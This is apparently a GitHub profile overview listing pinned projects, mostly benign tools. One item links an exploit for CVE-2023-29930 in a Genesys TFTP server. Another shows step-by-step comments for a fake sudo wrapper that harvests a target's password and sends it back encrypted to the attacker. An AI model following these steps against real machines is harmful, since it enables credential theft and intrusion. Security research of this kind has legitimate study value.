YSaxon - Overview

Pinned

  1. Easier more interesting Slackbots

    Python 1

  2. cliFFI: call native shared library functions right from your shell

    C 5 1

  3. Info and exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration

    Python 1

  4.
    # Optionally use apfs-clonechecker to check for clones before recloning, useful if you are rerunning the script
    export do_clone_check=${do_clone_check:-1}
    export cleanup=${cleanup:-1}
  5.
    #step 1: generate an rsa public/private keypair, and write your public key into the script below
    #step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
    #step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
    #note that you could easily modify to spoof other password taking utils like sudosh or su